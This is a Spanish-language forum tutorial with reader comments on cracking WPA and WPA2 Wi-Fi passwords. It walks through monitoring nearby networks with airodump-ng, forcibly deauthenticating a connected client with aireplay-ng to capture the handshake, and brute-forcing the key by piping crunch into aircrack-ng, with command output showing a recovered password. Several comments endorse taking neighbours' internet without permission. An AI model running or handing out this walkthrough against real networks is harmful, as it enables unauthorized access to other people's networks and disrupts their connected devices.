Romper WPA y WPA2 con crunch

Romper WPA y WPA2 con crunch

Hace un tiempo me venían pidiendo armar un tutorial sobre cómo crackear redes con cifrados WPA y WPA2.
Entonces decidí por realizar este tuto utilizando una herramienta que reemplaza a los diccionarios y en mi caso me dió bastante efectividad.

Empecemos por dejar en claro un par de cuestiones, la encriptación WEP como ya sabemos es fácil de romper, se capturan paquetes para luego por ingeniería inversa crackear esos paquetes y conseguir la clave.
En el caso de WPA y WPA2 es distinto, el método anterior no puede ser utilizado.
Estos tipos de cifrados utilizan algo llamado "handshake" (apretón de manos), es una especie de "saludo" entre el AP (Access Point) y el Cliente.
Lo que debemos capturar en este caso justamente es ese handshake para estar en "confianza" con el AP e intentar mediante un diccionario o en este caso con otro método que utilizo yo, romper la clave.

Una vez aclarado el funcionamiento, largo el método:

Voy a utilizar un software llamado "crunch"

Vamos a bajarlo desde acá

DESCARGAR CRUNCH


Una vez que lo descargamos, lo descomprimimos:

tar -xvzf crunch*.tgz


Entramos al directorio

cd crunch


Lo compilamos, por las dudas primero dejo el build-essential por si no lo tienen:

apt-get install build-essential


Ahora si, lo compilamos:

make


make install


Por último copiamos el comando al sbin:

cp crunch /usr/sbin/


Voy a dar por sentado que tienen instalado aircrack-ng, pero como soy bueno, les dejo el apt-get por las dudas:

apt-get install aircrack-ng



Empezamos !!


Ponemos en modo promiscuo (monitor) nuestra placa (en mi caso la interfaz es aht1, cada cual ponga la suya):

airodump-ng ath1


Me aparecen un par de redes:

CH 6 ][ Elapsed: 4 s ][ 2010-07-11 23:44

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1B:113:A9:5D 2 2 0 0 1 54 . WEP WEP dlink-007
00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA
00:21:29:EB:57:85 2 0 0 0 6 54 OPN Nazario_w
00:21:29:96:85:0C 9 3 1 0 6 54e WEP WEP Martin
00:1A:70:3D:3D:81 3 2 0 0 6 54 OPN linksys
00:1C:10:2A:C7:99 5 3 0 0 6 54e OPN Nazario_w
00:18:E7:56:26:89 7 4 0 0 6 54 . WPA TKIP PSK default
00:26:5A:53:E5:84 4 4 0 0 6 54 WEP WEP AR-RED
00:1D:7E:22:25:22 -1 0 3 1 6 -1 OPN <length:
00:18:E7:61:A9:47 8 3 0 0 6 54 . WPA TKIP PSK ESTUDIO J
00:0A:E5:79:83:E8 1 4 1 0 11 11 WEP WEP CIBERA
00:21:29:72C:32 5 3 0 0 11 54 . WEP WEP linksys
00:0F:A31:9C:5B 21 6 0 0 12 54 . WEP WEP LKSA
00:25:9C:69:97:B7 16 12 0 0 11 54e WPA2 TKIP PSK WIPS
00:0F:A31:67:8A 6 6 0 0 4 54 . WEP WEP Wi-Fi Arn
1C:AF7:42:E1:E6 -1 0 0 0 9 -1 <length:
00:15:63:11:69:90 16 10 0 0 9 12e. WEP WEP <length:
00:25:9C:3B:69:28 23 15 0 0 6 54e WEP WEP Apicc
00:40:77:BB:55:03 21 19 0 0 6 54e WPA TKIP PSK dd-wrt
00:21:00:61:B9:12 1 2 0 0 1 54 OPN FT89769


Juro que el ESSID PORINGA no es mío !!

Bueno, sigamos, la que voy a utilizar es "default" que tiene cifrado WPA TKIP PSK:

TKIP: (Temporal Key Integrity Protocol)
PSK: (Pre-Shared Key)



Una vez que tenemos el MAC del AP y el canal, ponemos:

airodump-ng -c NUMERODELCANAL --bssid MAC-DEL-AP -w default ath1


En este caso:

airodump-ng -c 6 --bssid 00:18:E7:56:26:89 -w default ath1


Ahora airodump sólo va a escuchar ese canal y ese AP.:

CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:E7:56:26:89 9 90 4152 762 5 6 54 . WPA TKIP PSK defau

BSSID STATION PWR Rate Lost Packets Probes

00:18:E7:56:26:89 00:0C:41:7A:77:43 51 11 - 1 42 1102
00:18:E7:56:26:89 00:1F:E1:23:33:40 15 0 - 1 0 61 default


Acá tenemos dos posibles escenarios:

1) Esperar que se conecte un nuevo cliente para adquirir el handshake
2) Desautenticar un cliente ya conectado para que vuelva a conectarse y adquirir el handshake

En este caso vamos a utilizar la segunda opción, anotamos el MAC del AP y el MAC del cliente conectado.

AP: 00:18:E7:56:26:89
Cliente Conectado: 00:0C:41:7A:77:43


Procedemos a desautenticar al cliente mediante este comando:

aireplay-ng -0 10 -a MAC-DEL-AP -c MAC-DEL-CLIENTE ath1


En este caso:

aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1


Hace algo así:

[root@debian dke]# aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1
23:46:18 Waiting for beacon frame (BSSID: 00:18:E7:56:26:89) on channel 6
23:46:19 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 1|173 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [14|155 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|207 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [11|173 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [31|186 ACKs]
23:46:26 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|240 ACKs]
23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [3186 ACKs]
23:46:27 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|137 ACKs]
23:46:28 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|147 ACKs]
23:46:32 Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [19|258 ACKs]


Si no lo desautentifica a la primera, volver a repetir el comando.

Una vez que el usuario es desautenticado y vuelva a ingresar nos va a aparecer arriba a la derecha el handshake

CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ][ WPA handshake: 00:18:E7:56:26:89


Listo, ya tenemos nuestro handshake, ahora utilizamos el crunch:


Escribimos esto:

crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -


En este caso:

crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b 00:18:E7:56:26:89 -w -


Aclaración: "crunch 8 9" hace referencia a que las claves WPA como mínimo tienen 8 caracteres, en este caso yo quiero que sólo pruebe hasta 9 caracteres, y que utilice los números 0123456789.
El 75% de los usuarios cometen el error de "securizar" la red con WPA y usar claves numéricas, que en este caso vamos a ver lo fáciles que son de conseguir con crunch
Si quisiéramos que crunch use letras, pondríamos "crunch 8 15 (máximo 15 caracteres)" abcdefghijklmno"

Ahora vamos a ver como crunch empieza a generar claves y a probarlas con el aircrack-ng:


[root@debian dke]# crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b 00:18:E7:56:26:89 -w -
Opening /home/dke/default-01.cap
Reading packets, please wait...



Aircrack-ng 1.0 rc3


[00:00:50] 72172 keys tested (1445.33 k/s)


KEY FOUND! [ 00072169 ]


Master Key : F0 BE A1 08 A5 4C D6 E4 08 5C 5F B4 42 4A 69 F0
32 1D C9 11 D5 F3 BB 64 3D F2 31 AB FA F7 A7 1E

Transient Key : 72 42 D4 F0 91 91 E9 27 F8 8E D0 DF 1D 48 1B AD
16 10 78 D5 B1 7E 8D 9E 7A 76 68 AC 44 2A 37 94
30 4C 47 F5 FE EB 01 7E 8B 64 87 EF 78 3D 2F 1E
E8 6B 4A 2E E4 95 F4 57 4A 32 05 54 66 AA D6 98

EAPOL HMAC : C8 28 B2 83 87 05 18 45 D8 26 C0 42 1D AB A0 7D



Listo, ya tenemos la clave

Un video que capturé para los despistados y por las caritas de mierda que aparecen..


link: http://www.youtube.com/watch?v=s8hR3By8v_E





Fuente: mi blog y yo

Fuentes de Información - Romper WPA y WPA2 con crunch

Tags: router | Wifi | wireless | ap | cifrado | Linux | wpa | aircrack | wpa2 | crunch | tkip | psk

Dar puntos
828 Puntos
Votos: 120 - T!score: 7/10
  • 62 Seguidores
  • 234.097 Visitas
  • 797 Favoritos

Comentarios Destacados

@dysloke Hace más de 3 años +91
mateitow001 dijo:mmm q post mas novato


no es para gente intelectual como vos que posteás &quot;las cumbias de lady gaga&quot;
@Serguti Hace más de 4 años +26
Muy bueno! Bien explicado.

164 comentarios - Romper WPA y WPA2 con crunch

@chequeterakata Hace más de 4 años -308
No creo que se deban publicar estas cosas... es como robar
@senthinel Hace más de 9 meses +7
Tecnicamente esa señal invade tu espacio, asi q puedes hacer lo q quieras con ella...
@MARITOGOMEZ Hace más de 6 meses
El Vecino que nó quiera "prestarme" señal ... que rodee Sú Casa, con unos buenos Muros de Plomo. SI ME INVADE, LO USO Y CHAU ...
@devian_03 Hace más de 4 meses
router
@maxpower001 Hace más de 4 años +8
buena data a favoritos
@Serguti Hace más de 4 años +26
Muy bueno! Bien explicado.
@STARKCDG Hace más de 11 meses +1
No estaria tan seguro chaval, tengo un pequeño server con 4 gpus ATI las cuales me entregan 16,000 k/s cada una dando un total de al rededor de 60,000 k/s. Prueba hashcat con una targeta ATI o NVIDIA con CUDA support. looking forward a comprarme una TESLA de Nvidia pero esas cabronas estan muy caras incluso para uno en US.
@maxpower001 Hace más de 4 años -18
dysloke dijo:
chequeterakata dijo:No creo que se deban publicar estas cosas... es como robar


No es esa la idea, la idea es que se tome conciencia.
Si vos seteás una clave estilo: ok@83mXXiS77 es IMPOSIBLE que te la roben, pueden pasar 500 años y no te la van a romper.
O si usás Radius

a lo sumo que tengas un computadora de la nasa
@maxpower001 Hace más de 4 años +21
00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA
@fullvice Hace más de 4 años -5
dysloke hackeroooouuuu !!! (?)
@maxpower001 Hace más de 4 años -8
162331
PUNTOS
esto responde tu pregunta
fullvice dijo:dysloke hackeroooouuuu !!! (?)
@Ezelrengo Hace más de 4 años +11
Encontré una razón para reinstalar mi kubuntu.
@maxpower001 Hace más de 4 años
fullvice dijo:dysloke hackeroooouuuu !!! (?)

162331
PUNTOS
esto responde tu pregunta
@berik Hace más de 4 años +3
maxpower001 dijo:00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA

@ajvajv Hace más de 4 años -10
maxpower001 dijo:
fullvice dijo:dysloke hackeroooouuuu !!! (?)

162331
PUNTOS
esto responde tu pregunta


Y si lees 4 lineas arriba de eso... &quot;Moderador&quot;

Mas que hacker es un acomodado
@facundogato Hace más de 4 años -4
ajvajv dijo:
maxpower001 dijo:
fullvice dijo:dysloke hackeroooouuuu !!! (?)

162331
PUNTOS
esto responde tu pregunta


Y si lees 4 lineas arriba de eso... &quot;Moderador&quot;

Mas que hacker es un acomodado
@recepcionista Hace más de 4 años +7
los que tienen miedo de este post es porque ocultan las cosas o no saben poner una buena contraseña su wifi, internet debería ser libre para todos en fin, vos pagas yo la uso también asi es la consigna en estOS últimos siglos ajajaja :buenspot:
@pampanero Hace más de 4 años -25
Mirá... a mi me parece que esta un poco mal que alguien garpe un router wifi para facilitar las conexiones y vos utilizas su internet... cada uno es libre de elegir SU contraseña con SU router...
@ajvajv Hace más de 4 años -1
dysloke dijo:traten de enfocar los comentarios sobre el tema
Ni hacker ni acomodado, posteo algo que quizá a muchos le sirva, a quienes no les sirve simplemente abstengan los comentarios offtopic


Me parece que especialmente vos tendrias que saber lo que es Taringa, rara vez un post se mantiene dentro del topic.

Ontopic: necesitas una placa tipo Atheros o con una Realtek chota alcanza?
@Cami_PR Hace más de 4 años -6
nu entendi na' pero igual pase (?)
@Fhran Hace más de 4 años +2
AMIGO COMO PUEDO HACER UN USB LIVE CON CRUNCH???
@hallucination Hace más de 11 meses
back track creo que lo tiene
@Mousse Hace más de 4 años +3
Te falta poner la placa en modo monitor primero.
@rastune Hace más de 4 años -5
para windows mobile no hay?
@Lucain Hace más de 4 años
ajvajv dijo:
dysloke dijo:traten de enfocar los comentarios sobre el tema
Ni hacker ni acomodado, posteo algo que quizá a muchos le sirva, a quienes no les sirve simplemente abstengan los comentarios offtopic


Me parece que especialmente vos tendrias que saber lo que es Taringa, rara vez un post se mantiene dentro del topic.

Ontopic: necesitas una placa tipo Atheros o con una Realtek chota alcanza?


Creo que cualquier placa que soporte la suite aircrack-ng, el ataque sige siendo con esta suite, el descifrado (lo dificil en este caso) es con crunch con el volcado de datos que da el aircrack.

Interesante el crunch, lo voy a probar en casa

Pregunta, se pueden usar rangos? algo como:

crunch 8 64 [A..Z] [a..z] [0..9]

Para descifrar algo alfanumerico y con mayusculas?
@rafazed Hace más de 4 años
chequeterakata dijo:No creo que se deban publicar estas cosas... es como robar


Puede que sea robar... pero cuando hay emergencias, por ejemplo de tareas de la escuela y se te va el jodido internet es necesario esto, ya me ha salvado varias veces.

dysloke dijo:
Mousse dijo:Te falta poner la placa en modo monitor primero.



Me parece que no:

Empezamos !!


Ponemos en modo promiscuo (monitor) nuestra placa (en mi caso la interfaz es aht1, cada cual ponga la suya):


Con el primer comando creo que automaticamente se pone en modo monitor, pero tambien para ponerla en modo monitor hay otro comando &quot;sudo airmon-ng&quot; y te muestra las interfaces que hay, entonces ponias &quot;sudo airmon-ng interfaz start&quot; y te la ponia en modo monitor.

Muy buen post! No sabia como crackear WPA! +10
@rafazed Hace más de 4 años
me olvidaba, cambia el comando para cuando es WPA2?
@Fhran Hace más de 4 años
por favor me dicen si se puede hacer un usb live con esto???
@cariatore Hace más de 4 años +2
lo voy a probar ! gracias!
@rafazed Hace más de 4 años
Fhran dijo:por favor me dicen si se puede hacer un usb live con esto???


creo que tendrias que meter a tu USB una distro como Ubuntu, pero con el paquete Crunch y Aircrack-ng previamente instalado, pero no se como hacer eso. Suerte!
@rafazed Hace más de 4 años
rafazed dijo:
Fhran dijo:por favor me dicen si se puede hacer un usb live con esto???
creo que tendrias que meter a tu USB una distro como Ubuntu, pero con el paquete Crunch y Aircrack-ng previamente instalado, pero no se como hacer eso. Suerte!


Creo que lo encontre! Tal vez esto te sirva: http://phylevn.mexrom.net/index.php/blog/show/Crea-tu-propio-LiveCD-personalizado-con-remastersys.html

Con eso creas una ISO de tu instalación actual, nada mas faltaria meter esa ISO a una USB con unetbootin.
@leogol16 Hace más de 4 años -2
hola buen tuto pero mi consulta es a q llamas &quot;RUTA-DEL-ARCHIVO-CAP&quot; ??

saludos
@leogol16 Hace más de 4 años -3
leogol16 dijo:hola buen tuto pero mi consulta es a q llamas &quot;RUTA-DEL-ARCHIVO-CAP&quot; ??

saludos


olvidate ya me di cuenta q es!!!! ejejej gracias!
@MHkoko88 Hace más de 4 años +2
a favs....creo que tendras muchos MP
@juaz26 Hace más de 4 años
chue hermano!!!
manso problema tengo!!!
descomprimo el archivo y . . . . . no se ve nada!!!
@juaz26 Hace más de 4 años
dysloke dijo:
juaz26 dijo:chue hermano!!!
manso problema tengo!!!
descomprimo el archivo y . . . . . no se ve nada!!!


Fijate de estar logueado como root, si lo descomprimiste con tar -xvzf crunch*.tgz y no te tiró error alguno tiene que aparecerte la carpeta si o si.

ya fue, lo hice con sudo nautilus y le di permisos!!!
@Fhran Hace más de 4 años -1
pero yo no tengo ni idea de como puedo poner esto en funcionamiento
@__n4rf__ Hace más de 4 años +2
che.. muy bueno! lo probe con mi propia conexion (dspues de borrar todo rastro de ella), tardo un rato, pero la saco! un groso!
Obvio, yo ya sabia el rango de caracteres en el que tenia que buscar, pero igual, de ultima le pongo todos los numeros y todo el abecedario (en mayusc y minusc), cuanto taradara maximo con una contraseña de 8-12 caracteres.. mientras tarde menos de 30min es genial, de ultima lo dejas crackeando, te dormis una siestita... y listouuuu
@narosky Hace más de 4 años
Guau, muy interesante! a favoritos gracias!
@Umask Hace más de 4 años
Veremos que utilidad le damos, por lo pronto se agradece y a favoritos
@yuyo Hace más de 4 años
5.
@PunXtaR Hace más de 4 años +2
__n4rf__ dijo:che.. muy bueno! lo probe con mi propia conexion (dspues de borrar todo rastro de ella), tardo un rato, pero la saco! un groso!
Obvio, yo ya sabia el rango de caracteres en el que tenia que buscar, pero igual, de ultima le pongo todos los numeros y todo el abecedario (en mayusc y minusc), cuanto taradara maximo con una contraseña de 8-12 caracteres.. mientras tarde menos de 30min es genial, de ultima lo dejas crackeando, te dormis una siestita... y listouuuu

a veces pueden ser miles de siestas xD
@javiiersss Hace más de 4 años +1
CH 6 ][ Elapsed: 4 s ][ 2010-07-11 23:44 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1B:113:A9:5D 2 2 0 0 1 54 . WEP WEP dlink-007 00:14:BF:79:8B:3C 5 2 0 0 6 54 WPA2 CCMP PSK PORINGA 00:21:29:EB:57:85 2 0 0 0 6 54 OPN Nazario_w 00:21:29:96:85:0C 9 3 1 0 6 54e WEP WEP Martin 00:1A:70:3D:3D:81 3 2 0 0 6 54 OPN linksys 00:1C:10:2A:C7:99 5 3 0 0 6 54e OPN Nazario_w 00:18:E7:56:26:89 7 4 0 0 6 54 . WPA TKIP PSK default 00:26:5A:53:E5:84 4 4 0 0 6 54 WEP WEP AR-RED 00:1D:7E:22:25:22 -1 0 3 1 6 -1 OPN &lt;length: 00:18:E7:61:A9:47 8 3 0 0 6 54 . WPA TKIP PSK ESTUDIO J 00:0A:E5:79:83:E8 1 4 1 0 11 11 WEP WEP CIBERA 00:21:29:72C:32 5 3 0 0 11 54 . WEP WEP linksys 00:0F:A31:9C:5B 21 6 0 0 12 54 . WEP WEP LKSA 00:25:9C:69:97:B7 16 12 0 0 11 54e WPA2 TKIP PSK WIPS 00:0F:A31:67:8A 6 6 0 0 4 54 . WEP WEP Wi-Fi Arn 1C:AF7:42:E1:E6 -1 0 0 0 9 -1 &lt;length: 00:15:63:11:69:90 16 10 0 0 9 12e. WEP WEP &lt;length: 00:25:9C:3B:69:28 23 15 0 0 6 54e WEP WEP Apicc 00:40:77:BB:55:03 21 19 0 0 6 54e WPA TKIP PSK dd-wrt 00:21:00:61:B9:12 1 2 0 0 1 54 OPN FT89769


( )
@xxHidanxx Hace más de 4 años +13
Romper WPA y WPA2 con crunch

o sea que cuando los rompes hacen &quot;crunch, crunch&quot;?
@sab007 Hace más de 4 años -7
xxHidanxx dijo:
Romper WPA y WPA2 con crunch

o sea que cuando los rompes hacen &quot;crunch, crunch&quot;?

@xxHidanxx Hace más de 4 años +3
sab007 dijo:
xxHidanxx dijo:
Romper WPA y WPA2 con crunch

o sea que cuando los rompes hacen &quot;crunch, crunch&quot;?


u.u
@mavabe Hace más de 4 años -1
Que es la RUTA-ARCHIVO-Cap?.
Es una ruta de un archivo existente?. Si es asi donde y cuando se creo?
@daledondale Hace más de 4 años +1
hola dysloke..hace rato puedo con las weps, y hace un tiempo empece a leer para romper wpa y wpa2.
Use el crunch y la verdad no me funciono..en cambio, con el aircrack solo y luego diccionario, rompi una wpa2. Igual gracias por el aporte, es solo mi experiencia personal, capaz a muchos les funciono. saludos
@factorial Hace más de 4 años -4
es una joda no? el wpa 2 solo se puede crackear con placas de video...